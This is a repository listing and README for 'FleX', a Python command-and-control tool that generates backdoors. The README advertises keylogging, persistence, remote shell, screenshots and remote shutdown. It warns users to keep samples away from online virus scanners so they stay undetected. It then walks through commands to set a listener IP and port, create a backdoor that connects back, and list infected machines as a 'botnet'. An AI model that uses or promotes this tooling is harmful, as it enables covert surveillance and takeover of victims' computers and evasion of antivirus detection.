https://github.com/bitwise-01/flex
A Simple C&C Server Written In Python
https://github.com/bitwise-01/flex
Last synced: about 1 year ago
JSON representation
A Simple C&C Server Written In Python
- Host: GitHub
- URL: https://github.com/bitwise-01/flex
- Owner: Bitwise-01
- License: mit
- Created: 2017-11-14T07:14:01.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2018-11-06T13:43:34.000Z (over 7 years ago)
- Last Synced: 2025-03-23T22:36:56.995Z (about 1 year ago)
- Language: Python
- Size: 6.48 MB
- Stars: 34
- Watchers: 2
- Forks: 18
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# FleX
FleX. A Simple C&C Server Written In Python.
__Warning:__ Do not submit any of the samples generated by this software to online scanners such as, Virustotal and NoDistribute. Doing so will render the software useless.
# Features
- Upload & Download
- Auto-persistence
- Screenshot
- Keylogger
- Shell
You can also:
- Get system information of a remote computer
- Get the geolocation of a remote computer
- Launch chrome on a remote computer
- Shutdown a remote computer
### Requirements
* [Mss](https://pypi.python.org/pypi/mss/) - Used for screenshots
* [Cmd2](https://pypi.python.org/pypi/cmd2) - Interactive command line
* [Wine](https://www.winehq.org/) - Used for generating executables
* [Requests](http://docs.python-requests.org/en/master/) - Used for Accessing the internet
### Installation
FleX requires [Python](https://www.python.org/downloads/release/python-2714/) v2.7 and [Kali Linux](https://www.kali.org/downloads/) to run.
Install the requirements
```sh
$ cd setup
$ python install.py
```
Start the program
```sh
$ cd ..
$ python flex.py
```
View all of commands
```sh
$ help
```
Get detail about a command
```sh
$ help getinfo
```
Configure the server
```sh
$ setip 127.0.0.1
$ setport 4444
```
View the server status
```sh
$ server_info
```
Start the server
```sh
$ server_start
```
Create a backdoor
```sh
$ create 127.0.0.1 4444 name
```
Display connected computers and their corresponding ID's
```sh
$ botnet
```